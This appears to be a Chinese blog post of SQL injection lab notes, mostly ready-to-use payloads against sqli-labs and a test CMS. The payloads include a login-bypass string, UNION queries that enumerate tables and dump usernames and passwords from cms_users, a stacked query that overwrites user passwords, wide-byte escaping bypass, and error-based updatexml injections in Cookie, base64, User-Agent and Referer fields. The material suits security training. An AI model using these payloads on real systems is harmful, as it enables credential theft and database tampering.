万能用户名
尝试登录后台
777' or 1 = 1 #
联合查询
两条 select 语句查询结果具有相同列数
判断列数
order by
判断显示位置
把第一条 select 语句的查询条件置为假
数据库敏感信息
查看所有的表名,从 information_schema.tables 查询,表名所属的库名 table_schema=database()
http://10.9.47.83/cms/show.php?id=33 and 1=2 union select 1,2,count(*),4,5,6,7,8,9,10,hex(group_concat(table_name)),12,13,14,15 from information_schema.tables where table_schema=database()
cms_article,cms_category,cms_file,cms_friendlink,cms_message,cms_notice,cms_page,cms_users
查看 cms_users 所有的列名,要表所属的库名和列所属的表名 table_schema=database() and table_name=‘cms_users’
http://10.9.47.83/cms/show.php?id=33 and 1=2 union select 1,2,count(*),4,5,6,7,8,9,10,hex(group_concat(column_name)),12,13,14,15 from information_schema.columns where table_schema=database() and table_name='cms_users'
userid,username,password
从 cms_users 表查看 username,password 字段
http://10.9.47.83/cms/show.php?id=33 and 1=2 union select 1,2,3,4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15 from cms_users
堆叠查询
先查询表
http://10.9.47.83/sqli-labs/Less-38/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
堆叠注入
http://10.9.47.83/sqli-labs/Less-38/?id=1'; update users set password="123457" --+
宽字节注入
服务器会把单引号转义,单引号由原来的定义字符串的特殊字符被转义为 普通字符
315c27
在5C 之前添加一个字符[81,FE] 之间,该字符就会和5c 组成一个汉字
成功注入
Cooki 注入
页面中无注入点
bp cookie注入,获取数据库名称
Cookie: uname=Dumb' and updatexml(1,concat(0x5e,(select database()),0x5e),1)#
base64 注入
发送到 bp
此处是 url 编码,ctrl+shift+u 解码
解码后为 base64 ,ctrl+shift+b 解码
变成明文
加 " 后 ctrl+b 进行base64编码
发现报错,使用报错注入
Dumb" and updatexml(1,concat(0x5e,(select database()),0x5e),1) #
ctrl+b base64 编码,发送,获得数据库名称
User-Agent 注入
注入的参数在 User-Agent,闭合方式为
wwq' and '1
User-Agent: wwq' and updatexml(1,concat(0x5e,(select database()),0x5e),1) and '1
Referer 注入
注入参数在 Referer 字段中
Referer: wwq' and updatexml(1,concat(0x5e,(select database()),0x5e),1) and '1
[外链图片转存中…(img-ZIOIXLSL-1699368726456)]
Referer 注入
注入参数在 Referer 字段中
Referer: wwq' and updatexml(1,concat(0x5e,(select database()),0x5e),1) and '1
1357
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
